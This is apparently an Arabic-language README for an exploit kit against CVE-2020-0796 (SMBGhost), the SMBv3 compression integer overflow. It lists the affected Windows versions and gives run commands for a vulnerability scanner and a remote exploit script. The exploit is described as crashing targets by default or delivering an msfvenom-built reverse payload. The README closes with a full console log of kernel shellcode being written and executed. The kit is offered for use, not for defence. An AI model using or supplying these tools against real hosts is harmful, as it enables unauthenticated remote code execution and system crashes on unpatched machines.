
cve-2020-0796 مجموعة أدوات الاستغلال
CVE-2020-0796 ناتج عن خطأ في بروتوكول SMBv3 عند معالجة حزم الضغط الخبيثة؛ فعند فك ضغط الحزمة باستخدام الطول الذي يرسله العميل، لا يتم التحقق من سلامة الطول، مما يؤدي في النهاية إلى تجاوز عدد صحيح. تسمح هذه الثغرة لمهاجم بعيد غير مصادق بتنفيذ تعليمات برمجية عشوائية على النظام المستهدف. تشبه هذه الثغرة ثغرة EternalBlue (MS17-010).
الإصدارات المتأثرة: Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for ARM64-based Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1909 for 32-bit Systems Windows 10 Version 1909 for ARM64-based Systems Windows 10 Version 1909 for x64-based Systems Windows Server, version 1903 (Server Core installation) Windows Server, version 1909 (Server Core installation)
scanner.py للمسح الضوئي واكتشاف المضيفين المصابين بثغرة CVE-2020-0796 الصيغة: python scanner.py ip مثال: python scanner.py 192.168.1.2
exploit.py يهاجم المضيف المستهدف المعرض للثغرة، وينفّذ PoC الافتراضي شاشة زرقاء، ويتطلب إنشاء PoC عكسي باستخدام msfvenom الصيغة: python exploit.py -ip ip مثال: python exploit.py -ip 192.168.1.2
الإخراج: [+] found low stub at phys addr 13000! [+] PML4 at 1ad000 [+] base of HAL heap at fffff79480000000 [+] ntoskrnl entry at fffff80645792010 [+] found PML4 self-ref entry 1eb [+] found HalpInterruptController at fffff79480001478 [+] found HalpApicRequestInterrupt at fffff80645cb3bb0 [+] built shellcode! [+] KUSER_SHARED_DATA PTE at fffff5fbc0000000 [+] KUSER_SHARED_DATA PTE NX bit cleared! [+] Wrote shellcode at fffff78000000a00! [+] Press a key to execute shellcode! [+] overwrote HalpInterruptController pointer, should have execution shortly...